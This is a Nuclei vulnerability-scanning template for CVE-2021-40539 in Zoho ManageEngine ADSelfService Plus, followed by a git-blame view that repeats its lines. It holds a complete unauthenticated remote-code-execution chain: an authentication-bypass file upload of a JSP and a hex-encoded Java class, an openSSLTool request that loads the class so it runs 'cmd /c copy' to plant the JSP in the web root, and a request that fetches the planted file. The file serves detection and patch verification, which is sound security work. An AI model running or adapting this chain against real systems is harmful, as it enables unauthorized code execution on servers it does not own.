nuclei-templates/http/cves/2021/CVE-2021-40539.yaml

id: CVE-2021-40539

info:
  name: Zoho ManageEngine ADSelfService Plus v6113 - Unauthenticated Remote Command Execution
  author: daffainfo,pdteam
  severity: critical
  description: Zoho ManageEngine ADSelfService Plus version 6113 and prior are vulnerable to a REST API authentication bypass vulnerability that can lead to remote code execution.
  remediation: Upgrade to ADSelfService Plus build 6114.
  reference:
    - https://attackerkb.com/topics/DMSNq5zgcW/cve-2021-40539/rapid7-analysis
    - https://www.synacktiv.com/publications/how-to-exploit-cve-2021-40539-on-manageengine-adselfservice-plus.html
    - https://github.com/synacktiv/CVE-2021-40539
    - https://nvd.nist.gov/vuln/detail/CVE-2021-40539
    - https://www.manageengine.com
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-40539
    cwe-id: CWE-706
    epss-score: 0.97412
    epss-percentile: 0.99915
    cpe: cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:4.5:4510:*:*:*:*:*:*
  metadata:
    max-request: 4
    vendor: zohocorp
    product: manageengine_adselfservice_plus
  tags: cve,cve2021,rce,ad,intrusive,manageengine,kev,zohocorp

http:
  - raw:
      - |
        POST /./RestAPI/LogonCustomization HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=8b1ab266c41afb773af2e064bc526458

        --8b1ab266c41afb773af2e064bc526458
        Content-Disposition: form-data; name="methodToCall"

        unspecified
        --8b1ab266c41afb773af2e064bc526458
        Content-Disposition: form-data; name="Save"

        yes
        --8b1ab266c41afb773af2e064bc526458
        Content-Disposition: form-data; name="form"

        smartcard
        --8b1ab266c41afb773af2e064bc526458
        Content-Disposition: form-data; name="operation"

        Add
        --8b1ab266c41afb773af2e064bc526458
        Content-Disposition: form-data; name="CERTIFICATE_PATH"; filename="ws.jsp"

        <%@ page import="java.util.*,java.io.*"%>
        <%@ page import="java.security.MessageDigest"%>
        <%
        String cve = "CVE-2021-40539";
        MessageDigest alg = MessageDigest.getInstance("MD5");
        alg.reset();
        alg.update(cve.getBytes());
        byte[] digest = alg.digest();
        StringBuffer hashedpasswd = new StringBuffer();
        String hx;
        for (int i=0;i<digest.length;i++){
          hx =  Integer.toHexString(0xFF & digest[i]);
          if(hx.length() == 1){hx = "0" + hx;}
          hashedpasswd.append(hx);
        }
        out.println(hashedpasswd.toString());
        %>
        --8b1ab266c41afb773af2e064bc526458--
      - |
        POST /./RestAPI/LogonCustomization HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=43992a07d9a30213782780204a9f032b

        --43992a07d9a30213782780204a9f032b
        Content-Disposition: form-data; name="methodToCall"

        unspecified
        --43992a07d9a30213782780204a9f032b
        Content-Disposition: form-data; name="Save"

        yes
        --43992a07d9a30213782780204a9f032b
        Content-Disposition: form-data; name="form"

        smartcard
        --43992a07d9a30213782780204a9f032b
        Content-Disposition: form-data; name="operation"

        Add
        --43992a07d9a30213782780204a9f032b
        Content-Disposition: form-data; name="CERTIFICATE_PATH"; filename="Si.class"

        {{hex_decode('CAFEBABE0000003400280D0A000C00160D0A0017001807001908001A08001B08001C08001D08001E0D0A0017001F0700200700210700220100063C696E69743E010003282956010004436F646501000F4C696E654E756D6265725461626C650100083C636C696E69743E01000D0A537461636B4D61705461626C6507002001000D0A536F7572636546696C6501000753692E6A6176610C000D0A000E0700230C002400250100106A6176612F6C616E672F537472696E67010003636D640100022F63010004636F707901000677732E6A737001002A2E2E5C776562617070735C61647373705C68656C705C61646D696E2D67756964655C746573742E6A73700C002600270100136A6176612F696F2F494F457863657074696F6E01000253690100106A6176612F6C616E672F4F626A6563740100116A6176612F6C616E672F52756E74696D6501000D0A67657452756E74696D6501001528294C6A6176612F6C616E672F52756E74696D653B01000465786563010028285B4C6A6176612F6C616E672F537472696E673B294C6A6176612F6C616E672F50726F636573733B0021000B000C0000000000020001000D0A000E0001000F0000001D00010001000000052AB70001B10000000100100000000600010000000200080011000E0001000F00000064000500020000002BB800024B2A08BD000359031204535904120553590512065359061207535907120853B600094CA700044BB10001000000260029000D0A00020010000000120004000000050004000600260007002A00080012000000070002690700130000010014000000020015')}}
        --43992a07d9a30213782780204a9f032b--
      - |
        POST /./RestAPI/Connection HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        methodToCall=openSSLTool&action=generateCSR&KEY_LENGTH=1024+-providerclass+Si+-providerpath+%22..%5Cbin%22
      - |
        GET /help/admin-guide/test.jsp HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "114f7ce498a54a1be1de1f1e5731d0ea" # MD5 of CVE-2021-40539

      - type: status
        status:
          - 200
# digest: 4a0a0047304502200ae96816ed8d3cde8a4e3f1fabfb13a05fdbe9538fe99f91c01681e58401f2df0221009d2d72046733d6827333bfa29bc4cf7a9ea12b53130db136f8e5a66f92d3dc8d:922c64590222798bb761d5b6d8e72950
Create CVE-2021-40539.yaml 2021-09-16 04:07:34 +00:00			`id: CVE-2021-40539`

			`info:`
Dashboard Content Enhancements (#4191) Dashboard Content Enhancements 2022-04-21 21:16:41 +00:00			`name: Zoho ManageEngine ADSelfService Plus v6113 - Unauthenticated Remote Command Execution`
Template update to confirm RCE 2021-11-13 11:06:43 +00:00			`author: daffainfo,pdteam`
Create CVE-2021-40539.yaml 2021-09-16 04:07:34 +00:00			`severity: critical`
Dashboard Text Enhancements (#3927) Dashboard text enhancements 2022-03-17 17:01:45 +00:00			`description: Zoho ManageEngine ADSelfService Plus version 6113 and prior are vulnerable to a REST API authentication bypass vulnerability that can lead to remote code execution.`
Updated 2021 CVEs 2023-09-06 12:09:01 +00:00			`remediation: Upgrade to ADSelfService Plus build 6114.`
Create CVE-2021-40539.yaml 2021-09-16 04:07:34 +00:00			`reference:`
			`- https://attackerkb.com/topics/DMSNq5zgcW/cve-2021-40539/rapid7-analysis`
Template update to confirm RCE 2021-11-13 11:06:43 +00:00			`- https://www.synacktiv.com/publications/how-to-exploit-cve-2021-40539-on-manageengine-adselfservice-plus.html`
			`- https://github.com/synacktiv/CVE-2021-40539`
Dashboard Content Enhancements (#4191) Dashboard Content Enhancements 2022-04-21 21:16:41 +00:00			`- https://nvd.nist.gov/vuln/detail/CVE-2021-40539`
CVE Enrichment :tada: 2023-07-11 19:49:27 +00:00			`- https://www.manageengine.com`
Auto Generated CVE annotations [Thu Sep 16 13:13:57 UTC 2021] :robot: 2021-09-16 13:13:57 +00:00			`classification:`
			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H`
refactor: Description field uniformization * info field reorder * reference values refactored to list * added new lines after the id and before the protocols * removed extra new lines * split really long descriptions to multiple lines (part 1) * other minor fixes 2022-04-22 10:38:41 +00:00			`cvss-score: 9.8`
Auto Generated CVE annotations [Thu Sep 16 13:13:57 UTC 2021] :robot: 2021-09-16 13:13:57 +00:00			`cve-id: CVE-2021-40539`
Added EPSS Percentile 2023-08-31 11:46:18 +00:00			`cwe-id: CWE-706`
TemplateMan Update [Tue Dec 12 11:07:51 UTC 2023] :robot: 2023-12-12 11:07:52 +00:00			`epss-score: 0.97412`
			`epss-percentile: 0.99915`
Updated 2021 CVEs 2023-09-06 12:09:01 +00:00			`cpe: cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:4.5:4510::::::`
Added max request counter of each template 2023-04-28 08:11:21 +00:00			`metadata:`
			`max-request: 4`
CVE Enrichment :tada: 2023-07-11 19:49:27 +00:00			`vendor: zohocorp`
			`product: manageengine_adselfservice_plus`
tags enhancements 2023-12-05 09:50:33 +00:00			`tags: cve,cve2021,rce,ad,intrusive,manageengine,kev,zohocorp`
Create CVE-2021-40539.yaml 2021-09-16 04:07:34 +00:00
Refactoring the directory structure based on protocols (#7137) * moving http templates * updated cves.json * moved network CVEs * updated scripts * updated workflows * updated requests to http * replaced network to tcp --------- Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com> 2023-04-27 04:28:59 +00:00			`http:`
Create CVE-2021-40539.yaml 2021-09-16 04:07:34 +00:00			`- raw:`
			`- \|`
Update CVE-2021-40539.yaml 2021-09-16 12:48:51 +00:00			`POST /./RestAPI/LogonCustomization HTTP/1.1`
Update CVE-2021-40539.yaml 2021-09-16 09:10:20 +00:00			`Host: {{Hostname}}`
Template update to confirm RCE 2021-11-13 11:06:43 +00:00			`Content-Type: multipart/form-data; boundary=8b1ab266c41afb773af2e064bc526458`

			`--8b1ab266c41afb773af2e064bc526458`
			`Content-Disposition: form-data; name="methodToCall"`

			`unspecified`
			`--8b1ab266c41afb773af2e064bc526458`
			`Content-Disposition: form-data; name="Save"`

			`yes`
			`--8b1ab266c41afb773af2e064bc526458`
			`Content-Disposition: form-data; name="form"`

			`smartcard`
			`--8b1ab266c41afb773af2e064bc526458`
			`Content-Disposition: form-data; name="operation"`

			`Add`
			`--8b1ab266c41afb773af2e064bc526458`
			`Content-Disposition: form-data; name="CERTIFICATE_PATH"; filename="ws.jsp"`

			`<%@ page import="java.util.,java.io."%>`
			`<%@ page import="java.security.MessageDigest"%>`
			`<%`
			`String cve = "CVE-2021-40539";`
			`MessageDigest alg = MessageDigest.getInstance("MD5");`
			`alg.reset();`
			`alg.update(cve.getBytes());`
			`byte[] digest = alg.digest();`
			`StringBuffer hashedpasswd = new StringBuffer();`
			`String hx;`
			`for (int i=0;i<digest.length;i++){`
			`hx = Integer.toHexString(0xFF & digest[i]);`
			`if(hx.length() == 1){hx = "0" + hx;}`
			`hashedpasswd.append(hx);`
			`}`
			`out.println(hashedpasswd.toString());`
			`%>`
			`--8b1ab266c41afb773af2e064bc526458--`
			`- \|`
			`POST /./RestAPI/LogonCustomization HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: multipart/form-data; boundary=43992a07d9a30213782780204a9f032b`

			`--43992a07d9a30213782780204a9f032b`
			`Content-Disposition: form-data; name="methodToCall"`

			`unspecified`
			`--43992a07d9a30213782780204a9f032b`
			`Content-Disposition: form-data; name="Save"`

			`yes`
			`--43992a07d9a30213782780204a9f032b`
			`Content-Disposition: form-data; name="form"`

			`smartcard`
			`--43992a07d9a30213782780204a9f032b`
			`Content-Disposition: form-data; name="operation"`

			`Add`
			`--43992a07d9a30213782780204a9f032b`
			`Content-Disposition: form-data; name="CERTIFICATE_PATH"; filename="Si.class"`

			{{hex_decode('CAFEBABE0000003400280D0A000C00160D0A0017001807001908001A08001B08001C08001D08001E0D0A0017001F0700200700210700220100063C696E69743E010003282956010004436F646501000F4C696E654E756D6265725461626C650100083C636C696E69743E01000D0A537461636B4D61705461626C6507002001000D0A536F7572636546696C6501000753692E6A6176610C000D0A000E0700230C002400250100106A6176612F6C616E672F537472696E67010003636D640100022F63010004636F707901000677732E6A737001002A2E2E5C776562617070735C61647373705C68656C705C61646D696E2D67756964655C746573742E6A73700C002600270100136A6176612F696F2F494F457863657074696F6E01000253690100106A6176612F6C616E672F4F626A6563740100116A6176612F6C616E672F52756E74696D6501000D0A67657452756E74696D6501001528294C6A6176612F6C616E672F52756E74696D653B01000465786563010028285B4C6A6176612F6C616E672F537472696E673B294C6A6176612F6C616E672F50726F636573733B0021000B000C0000000000020001000D0A000E0001000F0000001D00010001000000052AB70001B10000000100100000000600010000000200080011000E0001000F00000064000500020000002BB800024B2A08BD000359031204535904120553590512065359061207535907120853B600094CA700044BB10001000000260029000D0A00020010000000120004000000050004000600260007002A00080012000000070002690700130000010014000000020015')}}
			`--43992a07d9a30213782780204a9f032b--`
			`- \|`
			`POST /./RestAPI/Connection HTTP/1.1`
			`Host: {{Hostname}}`
Create CVE-2021-40539.yaml 2021-09-16 04:07:34 +00:00			`Content-Type: application/x-www-form-urlencoded`

Template update to confirm RCE 2021-11-13 11:06:43 +00:00			`methodToCall=openSSLTool&action=generateCSR&KEY_LENGTH=1024+-providerclass+Si+-providerpath+%22..%5Cbin%22`
			`- \|`
			`GET /help/admin-guide/test.jsp HTTP/1.1`
			`Host: {{Hostname}}`
Create CVE-2021-40539.yaml 2021-09-16 04:07:34 +00:00
			`matchers-condition: and`
			`matchers:`
			`- type: word`
			`words:`
CVE Enrichment :tada: 2023-07-11 19:49:27 +00:00			`- "114f7ce498a54a1be1de1f1e5731d0ea" # MD5 of CVE-2021-40539`
Create CVE-2021-40539.yaml 2021-09-16 04:07:34 +00:00
			`- type: status`
			`status:`
Add remediation information to CVE-2021-40539 and CVE-2021-44427 (#3237) * Added remediation to CVE-2021-40539 * Added remediation to CVE-2021-44427 Co-authored-by: Sandeep Singh <sandeep@projectdiscovery.io> 2021-12-01 16:53:24 +00:00			`- 200`
Auto Template Signing [Wed Dec 6 05:59:55 UTC 2023] :robot: 2023-12-06 05:59:56 +00:00			`# digest: 4a0a0047304502200ae96816ed8d3cde8a4e3f1fabfb13a05fdbe9538fe99f91c01681e58401f2df0221009d2d72046733d6827333bfa29bc4cf7a9ea12b53130db136f8e5a66f92d3dc8d:922c64590222798bb761d5b6d8e72950`